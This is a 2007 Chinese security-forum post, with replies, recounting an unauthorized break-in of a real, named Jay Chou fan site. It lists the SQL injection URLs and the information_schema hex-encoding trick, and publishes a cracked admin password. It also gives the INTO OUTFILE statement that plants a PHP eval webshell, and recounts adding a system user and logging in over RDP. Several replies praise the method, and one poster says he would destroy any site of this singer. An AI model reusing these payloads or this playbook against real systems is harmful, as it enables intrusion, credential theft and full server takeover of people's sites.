文章作者：Flyh4t[脚本安全小组]
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）
本文已经发表在《黑客手册》，转载请署名版权

某日在cn群里聊天，有朋友丢出一个jay官方网站的注入点，闲着无聊就测试了下。没想到最后轻松的得到了系统权限。在取得webshell过程中遇到点困难，也学到了一点东西。
看注射点，老规矩，先提交个单引号，返回如图1

ee347af38d85a4c10a46e0f1.jpg (484 KB)

2007-9-30 02:42

错误提示是
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
这个提示是很有玄机的，可以看到单引号没有转意，也就是说安全模式没有打开，这为我们后文得到webshell提供了机会。
   下面猜字段吧，体力活的说
http://www.jay2u.com/jaynews/ind ... 0union%20select%201,2,3,4



很轻松的猜出是四个字段。然后还是按部就班的看用户和权限
http://www.jay2u.com/jaynews/ind ... 0union%20select%201,2,3,version()



http://www.jay2u.com/jaynews/ind ... 0union%20select%201,2,3,user()



Oh yeah!!是mysql5的root权限，看到这里我觉得服务器拿下应该问题不大了。
和mssql、oracle、db2等数据库一样，mysql5提供了一个系统数据库：information_schema
在这个数据库里我们可以得到很多信息，包括当前用户权限、当前用户权限下可以访问的数据库、表、列名，因此在sql注射中，导致直接暴区数据库，表列名
开始操作，提交
http://www.jay2u.com/jaynews/ind ... 0union%20select%201,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME%20%20from%20information_schema.STATISTICS/*
貌似没有出现想象中的效果



提示
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
看来是union 前后字符集不搭配，只好编码一下了，提交
http://www.jay2u.com/jaynews/ind ... 0union%20select%201,hex(TABLE_SCHEMA),hex(TABLE_NAME),hex(COLUMN_NAME)%20%20from%20information_schema.STATISTICS/*



这次正常了，连上我自己的mysql，将16进制的编码还原
mysql> select 0x6A6179776562;
+----------------+
| 0x6A6179776562 |
+----------------+
| jayweb     |
+----------------+
1 row in set (0.00 sec)
mysql> select 0x41646D696E5F4964;
+--------------------+
| 0x41646D696E5F4964 |
+--------------------+
| Admin_Id      |
+--------------------+
1 row in set (0.00 sec)
mysql> select 0x61646D696E;
+--------------+
| 0x61646D696E |
+--------------+
| admin    |
+--------------+
1 row in set (0.00 sec)
这里表名出来了，是admin，但是没有暴出密码字段名，我们可以通过使用limit语法逐个表和字段查询，但是数据库很多表的话，不晓得什么时候才能摸清楚。刚好网站上有个phpbb的论坛，还是通过跨库查论坛数据库吧。
看了下，管理员有一个admin一个webmater，看样子webmater比较活跃，就查他的密码了。
提交
http://www.jay2u.com/jaynews/ind ... 0union%20select%201,2,username,user_password%20%20from%20phpbb_users%20where%20user_id=66333



到www.cmd5.com上查询出来密码是 ：042990
登陆后台去参观下吧 ：）



在后台琢磨了半天，尝试了添加上传类型等办法都没能得到webshell，难道只能渗透到这个程度吗？
喝杯水冷静了下，想起来我已经知道它的安全模式是关闭的而且我们有足够的权限，这意味着什么？嘿嘿，只要知道路径就能通过注射导出一个webshell。现在的问题就是得到路径了，利用uploadpic.php中getimagesize()函数的小bug，先在后台添加上传类型 text/asa，然后到前台传图片的地方传个asa文件，这个函数无法读取起大小，暴出错误时泄露了绝对路径



下面最辉煌的时刻终于要到来了，构造导出webshell的语句
http://www.jay2u.com/jaynews/ind ... 0union%20select%201,2,&#39;<?eval($_POST[cmd])?>&#39;,4%20from%20mysql.user%20into%20outfile%20&#39;D:\\website\\jayweb\\forum\\userpix\\cnsst.php&#39;/*
成功了！！



用客户端连上，传了个大马



由于编码问题看着有点乱，一样使用，执行命令看看



好象服务器的php是系统权限的，添加了一个用户



连上3389参观下闪人



文章到这里就结束了，没什么技术含量。主要还是服务器安全做的不好，最后才能得到最高权限。

ps：图片传不上，图片插入又因为https不好显示，把word文档发出来吧

传上来，和谐社会论坛暂时HTTPS，如果开放显示图片显示会有不安全提示

magic_quote = off
那就没什么讨论价值了.

本文不是技术帖子，但忍不住想说2句
希望你真的没搞什么破坏，例如挂马！
不然你的生活可能会受到干扰
JAY的FANS太多了，哦 对了 我也挺佩服他的！

引用:

引用第6楼lovelyl2于2007-09-30 13:20发表的 :
本文不是技术帖子，但忍不住想说2句
希望你真的没搞什么破坏，例如挂马！
不然你的生活可能会受到干扰
JAY的FANS太多了，哦 对了 我也挺佩服他的！

从高中开始听他音乐的，伴我度过了枯燥的高三，呵呵
文章写好第一时间就发给管理员了

确实是 我也是杰迷////
哎....
magic_quote = off
那就没什么讨论价值了.

呵呵 顶

说实话
我讨厌周杰伦
至于官方..........http://www.jaycn.com 我觉得这个是最好的了

引用:

引用第11楼oursunny于2007-10-02 16:19发表的 :
PHP注入,应该可以用工具猜的吧?
楼主这样猜不累么?

拿工具猜，就没有什么看点了

哎。。。。~我觉得只要知道原理就好了。

没必要都用手来弄吧。。。~用工具猜不一定就显示没技术。~用手猜也不一定显示就有技术。

实在工具没办法的情况下当然手工了。~~但是工具可以做到的我们何必用手呢？~~~随便说说。别介意~~

PHP 的注射常用的工具就是 CASI 了
但是黑哥还没有更新php5下的注射功能
php5的注射还是有很多不同的，参考黑哥的相关文章
貌似sqlmap是个很强大的工具，但是我恰好没有py解释器

官方网站好象是www.jaycn.com吧...
不过作者提到的PHP注入技巧确实值得借鉴和学习...

引用:

引用第11楼7个b于2007-10-04 21:04发表的 :
官方网站好象是www.jaycn.com吧...
不过作者提到的PHP注入技巧确实值得借鉴和学习...

技巧源于何处?
你的帖子全是毫无意义的.

3楼的 我无语 我对于别的站不会这么干坏事 但对于 周的站 能干一个就灭一个  极度恶心 讨厌周!!!!

我觉得 应该还有其他的方法吧  我是说得到 论坛管理后台后的入侵 应该还有其他方法 不过楼主的方法不错!

呵呵，其实不然，手工注入没有你们想像得那么累人
如果明确表段、字段名，比用工具猜起来就快了很多
而且比工具猜的结果较为精确一些，嘿嘿……

magic_quote = off

强烈怀疑是不是有高人先进去过一次。

15楼的 是不是你先进去把 magic_quote = off 给设置了?

可能是服务器管理员自己改的吧~~
magic_quote = off
都5.0了.默认的不是off吧~~
难到是服务器自己改的.
想人让进来日...